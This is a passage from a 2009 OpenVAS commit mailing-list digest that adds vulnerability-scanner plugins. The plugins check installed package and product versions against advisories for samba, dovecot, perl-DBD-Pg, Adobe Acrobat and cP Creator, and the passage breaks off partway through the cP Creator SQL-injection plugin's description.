+if(isrpmvuln(pkg:"lib64graphvizr0", rpm:"lib64graphvizr0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizruby0", rpm:"lib64graphvizruby0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviz-static-devel", rpm:"lib64graphviz-static-devel~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviztcl0", rpm:"lib64graphviztcl0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/mdksa_2009_255.nasl =================================================================== --- trunk/openvas-plugins/scripts/mdksa_2009_255.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/mdksa_2009_255.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,84 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory MDVSA-2009:255 (perl-DBD-Pg) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(64998); + script_cve_id("CVE-2009-0663"); + script_version ("$"); + script_name("Mandrake Security Advisory MDVSA-2009:255 (perl-DBD-Pg)"); + + desc = " +The remote host is missing an update to perl-DBD-Pg +announced via advisory MDVSA-2009:255. + +A vulnerability was discovered and corrected in perl-DBD-Pg: + +Heap-based buffer overflow in the DBD::Pg module for Perl might allow +context-dependent attackers to execute arbitrary code via unspecified +input to an application that uses the getline and pg_getline functions +to read database rows. + +This update provides a fix for this vulnerability. + +Affected: Corporate 4.0 + +Solution: +To upgrade automatically use MandrakeUpdate or urpmi. The verification +of md5 checksums and GPG signatures is performed automatically for you. + +https://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:255 + +Risk factor : High"; + + script_description(desc); + + script_summary("Mandrake Security Advisory MDVSA-2009:255 (perl-DBD-Pg)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Mandrake Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"perl-DBD-Pg", rpm:"perl-DBD-Pg~1.43~2.1.20060mlcs4", rls:"MNDK_4.0")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/ubuntu_838_1.nasl =================================================================== --- trunk/openvas-plugins/scripts/ubuntu_838_1.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/ubuntu_838_1.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,138 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory USN-838-1 (dovecot) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65010); + script_cve_id("CVE-2008-4577", "CVE-2008-5301", "CVE-2009-2632", "CVE-2009-3235"); + script_version ("$"); + script_name("Ubuntu USN-838-1 (dovecot)"); + + desc = " +The remote host is missing an update to dovecot +announced via advisory USN-838-1. + +Details follow: + +It was discovered that the ACL plugin in Dovecot would incorrectly handle +negative access rights. An attacker could exploit this flaw to access the +Dovecot server, bypassing the indended access restrictions. This only +affected Ubuntu 8.04 LTS. (CVE-2008-4577) + +It was discovered that the ManageSieve service in Dovecot incorrectly +handled .. in script names. A remote attacker could exploit this to read +and modify arbitrary sieve files on the server. This only affected Ubuntu +8.10. (CVE-2008-5301) + +It was discovered that the Sieve plugin in Dovecot incorrectly handled +certain sieve scripts. An authenticated user could exploit this with a +crafted sieve script to cause a denial of service or possibly execute +arbitrary code. (CVE-2009-2632, CVE-2009-3235) + +Solution: +The problem can be corrected by upgrading your system to the +following package versions: + +Ubuntu 8.04 LTS: + dovecot-common 1:1.0.10-1ubuntu5.2 + +Ubuntu 8.10: + dovecot-common 1:1.1.4-0ubuntu1.3 + +Ubuntu 9.04: + dovecot-common 1:1.1.11-0ubuntu4.1 + +In general, a standard system upgrade is sufficient to effect the +necessary changes. + +https://secure1.securityspace.com/smysecure/catid.html?in=USN-838-1 + +Risk factor : High"; + + script_description(desc); + + script_summary("Ubuntu USN-838-1 (dovecot)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Ubuntu Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/packages"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-deb.inc"); +vuln = 0; +if(isdpkgvuln(pkg:"dovecot-common", ver:"1.0.10-1ubuntu5.2", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-dev", ver:"1.0.10-1ubuntu5.2", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-imapd", ver:"1.0.10-1ubuntu5.2", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-pop3d", ver:"1.0.10-1ubuntu5.2", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-common", ver:"1.1.4-0ubuntu1.3", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-dev", ver:"1.1.4-0ubuntu1.3", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-imapd", ver:"1.1.4-0ubuntu1.3", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-pop3d", ver:"1.1.4-0ubuntu1.3", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-postfix", ver:"1.1.11-0ubuntu4.1", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-common", ver:"1.1.11-0ubuntu4.1", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-dev", ver:"1.1.11-0ubuntu4.1", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-imapd", ver:"1.1.11-0ubuntu4.1", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-pop3d", ver:"1.1.11-0ubuntu4.1", rls:"UBUNTU9.04")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/ubuntu_839_1.nasl =================================================================== --- trunk/openvas-plugins/scripts/ubuntu_839_1.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/ubuntu_839_1.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,278 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory USN-839-1 (samba) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65011); + script_cve_id("CVE-2009-1886", "CVE-2009-1888", "CVE-2009-2813", "CVE-2009-2906", "CVE-2009-2948"); + script_version ("$"); + script_name("Ubuntu USN-839-1 (samba)"); + + desc = " +The remote host is missing an update to samba +announced via advisory USN-839-1. + +Details follow: + +J. David Hester discovered that Samba incorrectly handled users that lack +home directories when the automated [homes] share is enabled. An +authenticated user could connect to that share name and gain access to the +whole filesystem. (CVE-2009-2813) + +Tim Prouty discovered that the smbd daemon in Samba incorrectly handled +certain unexpected network replies. A remote attacker could send malicious +replies to the server and cause smbd to use all available CPU, leading to a +denial of service. (CVE-2009-2906) + +Ronald Volgers discovered that the mount.cifs utility, when installed as a +setuid program, would not verify user permissions before opening a +credentials file. A local user could exploit this to use or read the +contents of unauthorized credential files. (CVE-2009-2948) + +Reinhard Ni?l discovered that the smbclient utility contained format string +vulnerabilities in its file name handling. Because of security features in +Ubuntu, exploitation of this vulnerability is limited. If a user or +automated system were tricked into processing a specially crafted file +name, smbclient could be made to crash, possibly leading to a denial of +service. This only affected Ubuntu 8.10. (CVE-2009-1886) + +Jeremy Allison discovered that the smbd daemon in Samba incorrectly handled +permissions to modify access control lists when dos filemode is enabled. A +remote attacker could exploit this to modify access control lists. This +only affected Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-1886) + +Solution: +The problem can be corrected by upgrading your system to the +following package versions: + +Ubuntu 6.06 LTS: + samba 3.0.22-1ubuntu3.9 + smbfs 3.0.22-1ubuntu3.9 + +Ubuntu 8.04 LTS: + samba 3.0.28a-1ubuntu4.9 + smbfs 3.0.28a-1ubuntu4.9 + +Ubuntu 8.10: + samba 2:3.2.3-1ubuntu3.6 + smbclient 2:3.2.3-1ubuntu3.6 + smbfs 2:3.2.3-1ubuntu3.6 + +Ubuntu 9.04: + samba 2:3.3.2-1ubuntu3.2 + smbfs 2:3.3.2-1ubuntu3.2 + +In general, a standard system upgrade is sufficient to effect the +necessary changes. + +https://secure1.securityspace.com/smysecure/catid.html?in=USN-839-1 + +Risk factor : High"; + + script_description(desc); + + script_summary("Ubuntu USN-839-1 (samba)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Ubuntu Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/packages"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-deb.inc"); +vuln = 0; +if(isdpkgvuln(pkg:"samba-doc-pdf", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-doc", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libpam-smbpass", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsmbclient-dev", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsmbclient", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"python2.4-samba", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-common", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-dbg", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"smbclient", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"smbfs", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"swat", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"winbind", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-doc-pdf", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-doc", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libpam-smbpass", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsmbclient-dev", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsmbclient", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-common", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-dbg", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"smbclient", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"smbfs", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"swat", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"winbind", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-doc-pdf", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-doc", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libpam-smbpass", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsmbclient-dev", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsmbclient", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libwbclient0", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-common", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-dbg", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-tools", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"smbclient", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"smbfs", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"swat", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"winbind", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-doc-pdf", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-doc", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libpam-smbpass", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsmbclient-dev", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsmbclient", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libwbclient0", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-common", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-dbg", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"smbclient", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"smbfs", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"winbind", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-tools", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"swat", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} From scm-commit at wald.intevation.org Tue Oct 6 07:21:20 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 07:21:20 +0200 (CEST) Subject: [Openvas-commits] r5379 - in trunk/openvas-plugins: . scripts Message-ID: <20091006052120.59458852B84E@pyrosoma.intevation.org> Author: chandra Date: 2009-10-06 07:21:15 +0200 (Tue, 06 Oct 2009) New Revision: 5379 Added: trunk/openvas-plugins/scripts/gb_adobe_acrobat_pdf_dos_vuln.nasl trunk/openvas-plugins/scripts/gb_cpcreator_detect.nasl trunk/openvas-plugins/scripts/gb_cpcreator_sql_inj_vuln.nasl trunk/openvas-plugins/scripts/gb_google_chrome_sec_bypass_vuln_oct09.nasl trunk/openvas-plugins/scripts/gb_ibm_db2_mult_vuln_lin_oct09.nasl trunk/openvas-plugins/scripts/gb_ibm_db2_mult_vuln_win_oct09.nasl trunk/openvas-plugins/scripts/gb_ibm_db2_unspesified_vuln_lin.nasl trunk/openvas-plugins/scripts/gb_ibm_db2_unspesified_vuln_win.nasl trunk/openvas-plugins/scripts/gb_ms_ie_ssl_certi_sec_bypass_vuln_oct09.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-06 00:49:40 UTC (rev 5378) +++ trunk/openvas-plugins/ChangeLog 2009-10-06 05:21:15 UTC (rev 5379) @@ -1,3 +1,16 @@ +2009-10-06 Chandrashekhar B + + * scripts/gb_ibm_db2_unspesified_vuln_win.nasl, + scripts/gb_google_chrome_sec_bypass_vuln_oct09.nasl, + scripts/gb_cpcreator_detect.nasl, + scripts/gb_cpcreator_sql_inj_vuln.nasl, + scripts/gb_ibm_db2_unspesified_vuln_lin.nasl, + scripts/gb_ms_ie_ssl_certi_sec_bypass_vuln_oct09.nasl, + scripts/gb_ibm_db2_mult_vuln_win_oct09.nasl, + scripts/gb_ibm_db2_mult_vuln_lin_oct09.nasl, + scripts/gb_adobe_acrobat_pdf_dos_vuln.nasl: + Added new plugins. + 2009-10-05 Thomas Reinke *scripts/deb_1896_1.nasl, Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2009-10-06 00:49:40 UTC (rev 5378) +++ trunk/openvas-plugins/cve_current.txt 2009-10-06 05:21:15 UTC (rev 5379) @@ -72,22 +72,22 @@ CVE-2009-3293 SecPod svn R CVE-2009-3328 SecPod CVE-2009-3327 SecPod -CVE-2009-3330 SecPod -CVE-2009-3369 SecPod -CVE-2009-2817 SecPod svn L +CVE-2009-3330 SecPod svn R +CVE-2009-3369 SecPod +CVE-2009-2817 SecPod svn L CVE-2009-3366 SecPod svn R -CVE-2009-3367 Secpod svn R -CVE-2009-3364 SecPod svn L -CVE-2009-3340 SecPod svn L -CVE-2009-3431 SecPod -CVE-2009-3444 SecPod -CVE-2009-3455 SecPod -CVE-2009-3454 SecPod -CVE-2009-3456 SecPod +CVE-2009-3367 Secpod svn R +CVE-2009-3364 SecPod svn L +CVE-2009-3340 SecPod svn L +CVE-2009-3431 SecPod svn L +CVE-2009-3444 SecPod +CVE-2009-3455 SecPod +CVE-2009-3454 SecPod svn L +CVE-2009-3456 SecPod svn L CVE-2009-3471 SecPod CVE-2009-3473 SecPod -CVE-2009-3472 SecPod -CVE-2009-3478 SecPod +CVE-2009-3472 SecPod +CVE-2009-3478 SecPod 36407 Greenbone svn R CVE-2006-5789 Greenbone svn R CVE-2009-2629 Greenbone svn R Added: trunk/openvas-plugins/scripts/gb_adobe_acrobat_pdf_dos_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_adobe_acrobat_pdf_dos_vuln.nasl 2009-10-06 00:49:40 UTC (rev 5378) +++ trunk/openvas-plugins/scripts/gb_adobe_acrobat_pdf_dos_vuln.nasl 2009-10-06 05:21:15 UTC (rev 5379) @@ -0,0 +1,84 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_adobe_acrobat_pdf_dos_vuln.nasl 5056 2009-10-05 18:14:26Z oct $ +# +# Adobe Acrobat PDF File Denial Of Service Vulnerability +# +# Authors: +# Sharath S +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801104); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3431"); + script_bugtraq_id(35148); + script_name("Adobe Acrobat PDF File Denial Of Service Vulnerability"); + desc = " + Overview: This host has Adobe Acrobat or Adobe Acrobat Reader installed and + is prone to Denial of Service vulnerability. + + Vulnerability Insight: + A Stack consumption error exists when handling a PDF file containing a large + number of '[' characters to the alert method. + + Impact: + Successful attacks results in Denial of Service. + + Impact Level: Application + + Affected Software/OS: + Adobe Acrobat version 9.1.1 and prior on Windows. + + Fix: No solution or patch is available as on 05th October, 2009. Information + regarding this issue will be updated once the solution details are available. + For updates refer, http://www.adobe.com/products/acrobat/?promoid=BPDDU + + References: + http://www.security-database.com/detail.php?alert=CVE-2009-3431 + + CVSS Score: + CVSS Base Score : 5.0 (AV:N/AC:L/Au:NR/C:N/I:N/A:P) + CVSS Temporal Score : 4.5 + Risk factor: Medium"; + + script_description(desc); + script_summary("Check for the version of Adobe Acrobat"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("Denial of Service"); + script_dependencies("secpod_adobe_prdts_detect_win.nasl"); + script_require_keys("Adobe/Acrobat/Win/Ver"); + exit(0); +} + + +include("version_func.inc"); + +# Check for Adobe Acrobat version <= 9.1.1 +acrobatVer = get_kb_item("Adobe/Acrobat/Win/Ver"); +if(acrobatVer) +{ + if(version_is_less_equal(version:acrobatVer, test_version:"9.1.1")) + { + security_warning(0); + exit(0); + } +} Property changes on: trunk/openvas-plugins/scripts/gb_adobe_acrobat_pdf_dos_vuln.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/gb_cpcreator_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_cpcreator_detect.nasl 2009-10-06 00:49:40 UTC (rev 5378) +++ trunk/openvas-plugins/scripts/gb_cpcreator_detect.nasl 2009-10-06 05:21:15 UTC (rev 5379) @@ -0,0 +1,68 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_cpcreator_detect.nasl 4962 2009-10-05 16:25:36Z oct $ +# +# cP Creator Version Detection +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801005); + script_version("$Revision: 1.0$"); + script_name("cP Creator Version Detection"); + desc = " + Overview: This script finds the installed cP Creator version and saves + the result in KB. + + Risk factor: Informational"; + + script_description(desc); + script_summary("Set the version of cP Creator in KB"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("Service detection"); + script_dependencies("find_service.nes"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); + +cpcreatPort = get_http_port(default:80); +if(!cpcreatPort){ + exit(0); +} + +foreach path (make_list("/", "/cPcreator", "/cp", cgi_dirs())) +{ + sndReq = http_get(item:string(path, "/index.php"), port:cpcreatPort); + rcvRes = http_send_recv(port:cpcreatPort, data:sndReq); + if("cP Creator" >< rcvRes) + { + cpcreatVer = eregmatch(pattern:"[V|v]([0-9.]+)", string:rcvRes); + if(cpcreatVer[1] != NULL){ + set_kb_item(name:"www/" + cpcreatPort + "/cPCreator", + value:cpcreatVer[1] + " under " + path); + } + } +} Added: trunk/openvas-plugins/scripts/gb_cpcreator_sql_inj_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_cpcreator_sql_inj_vuln.nasl 2009-10-06 00:49:40 UTC (rev 5378) +++ trunk/openvas-plugins/scripts/gb_cpcreator_sql_inj_vuln.nasl 2009-10-06 05:21:15 UTC (rev 5379) @@ -0,0 +1,95 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_cpcreator_sql_inj_vuln.nasl 4962 2009-10-05 15:11:27Z oct $ +# +# cP Creator 'tickets' Cookie SQL Injection Vulnerability +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801006); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3330"); + script_name("cP Creator 'tickets' Cookie SQL Injection Vulnerability"); + desc =" + Overview: The host is running cP Creator and is prone to SQL Injection + Vulnerability + + Vulnerability Insight: + Input passed to the 'tickets' cookie in index.php (if 'page' is set to + 'support' and 'task' is set to 'ticket') is not properly sanitised before + being used in SQL queries. + + Impact: + Successful exploitation could allow remote attackers to conduct SQL injection + attacks. + + Impact Level: Application. + + Affected Software/OS: + cP Creator Version 2.7.1 and prior. + + Fix: + No solution or patch is available as on 05th October, 2009. Information + regarding this issue will be updated once the solution details are available. + For updates refer, http://www.cpcreator.com/download.php 